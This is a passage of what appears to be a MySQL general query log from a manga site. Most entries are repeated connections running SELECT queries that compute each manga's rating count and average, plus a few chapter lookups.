mangauser@localhost on u317079482_mangaberri_1 using Socket 330656409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330656409 Quit 330656410 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330656410 Quit 330656411 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330656411 Quit 330656412 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330656412 Quit 330656413 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330656413 Quit 330656414 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330656414 Quit 330656415 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330656415 Quit 330656416 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '155' order by created desc 330656416 Quit 330656417 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330656417 Quit 330656418 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330656418 Quit 330656419 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330656419 Quit 330656420 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330656420 Quit 330656421 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330656421 Quit 330656422 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330656422 Quit 330656423 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330656423 Quit 330656424 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330656424 Quit 330656425 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330656425 Quit 330656426 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330656426 Quit 330656427 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330656427 Quit 330656428 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330656428 Quit 330656429 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330656429 Quit 330656430 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330656430 Quit 330656431 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330656431 Quit 330656432 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330656432 Quit 330656433 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330656433 Quit 330656434 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330656434 Quit 330656435 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330656435 Quit 330656436 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330656436 Quit 330656437 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330656437 Quit 330656438 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330656438 Quit 330656439 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330656439 Quit 330656440 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330656440 Quit 330656441 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330656441 Quit 330656442 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330656442 Quit 330656443 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330656443 Quit 330656444 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330656444 Quit 330656445 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330656445 Quit 330656446 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330656446 Quit 330656447 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330656447 Quit 330656448 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330656448 Quit 330656449 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330656449 Quit 330656450 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330656450 Quit 330656451 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330656451 Quit 330656452 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330656452 Quit 330656453 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330656453 Quit 330656454 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330656454 Quit 330656455 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330656455 Quit 330656456 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330656456 Quit 330656457 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330656457 Quit 330656458 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330656458 Quit 330656459 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330656459 Quit 330656460 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330656460 Quit 330656461 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330656461 Quit 330656462 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330656462 Quit 330656463 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330656463 Quit 330656464 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330656464 Quit 330656465 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330656465 Quit 330656466 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330656466 Quit 330656467 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330656467 Quit 330656468 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330656468 Quit 330656469 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330656469 Quit 330656470 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330656470 Quit 330656471 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330656471 Quit 330656472 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330656472 Quit 330656473 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330656473 Quit 330656474 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330656474 Quit 330656475 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330656475 Quit 330656476 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330656476 Quit 330656477 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330656477 Quit 330656478 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330656478 Quit 330656479 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330656479 Quit 330656480 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330656480 Quit 330656481 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330656481 Quit 330656482 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330656482 Quit 330656483 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330656483 Quit 330656484 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330656484 Quit 330656485 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330656485 Quit 330656486 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330656486 Quit 330656487 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330656487 Quit 330656488 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330656488 Quit 330656489 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330656489 Quit 330656490 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330656490 Quit 330656491 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330656491 Quit 330656492 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330656492 Quit 330656493 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330656493 Quit 330656494 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330656494 Quit 330656495 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330656495 Quit 330656496 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330656496 Quit 330656497 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330656497 Quit 330656498 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330656498 Quit 330656499 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330656499 Quit 330656500 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330656500 Quit 330656501 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330656501 Quit 330656502 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330656502 Quit 330656503 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330656503 Quit 330656504 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330656504 Quit 330656505 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '253' order by created desc 330656505 Quit 330656506 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330656506 Quit 330656507 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330656507 Quit 330656508 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330656508 Quit 330656509 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330656509 Quit 330656510 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330656510 Quit 330656511 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330656511 Quit 330656512 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330656512 Quit 330656513 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330656513 Quit 330656514 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330656514 Quit 330656515 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330656515 Quit 330656516 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330656516 Quit 330656517 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330656517 Quit 330656518 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330656518 Quit 330656519 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330656519 Quit 330656520 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330656520 Quit 330656521 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330656521 Quit 330656522 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330656522 Quit 330656523 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330656523 Quit 330656524 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330656524 Quit 330656525 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330656525 Quit 330656526 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330656526 Quit 330656527 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330656527 Quit 330656528 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330656528 Quit 330656529 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330656529 Quit 330656530 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330656530 Quit 330656531 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330656531 Quit 330656532 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330656532 Quit 330656533 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330656533 Quit 330656534 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330656534 Quit 330656535 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330656535 Quit 330656536 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330656536 Quit 330656537 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330656537 Quit 330656538 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330656538 Quit 330656539 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330656539 Quit 330656541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656540 Quit 330656541 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9894' 330656542 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330656542 Quit 330656543 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656541 Quit 330656543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330656543 Quit 330656544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656544 Query select * FROM chapters where id = '9894' 330656545 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330656545 Quit 330656546 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656544 Quit 330656546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330656546 Quit 330656547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656547 Query select * FROM chapters where manga_id = '58' order by id desc 330656548 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330656548 Quit 330656549 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330656549 Quit 330656550 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330656550 Quit 330656551 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330656551 Quit 330656552 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330656552 Quit 330656553 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330656553 Quit 330656554 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330656554 Quit 330656555 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330656555 Quit 330656556 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330656556 Quit 330656557 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330656557 Quit 330656558 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330656558 Quit 330656559 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330656559 Quit 330656560 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330656560 Quit 330656561 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330656561 Quit 330656562 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330656562 Quit 330656563 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656563 Query select count(id) as 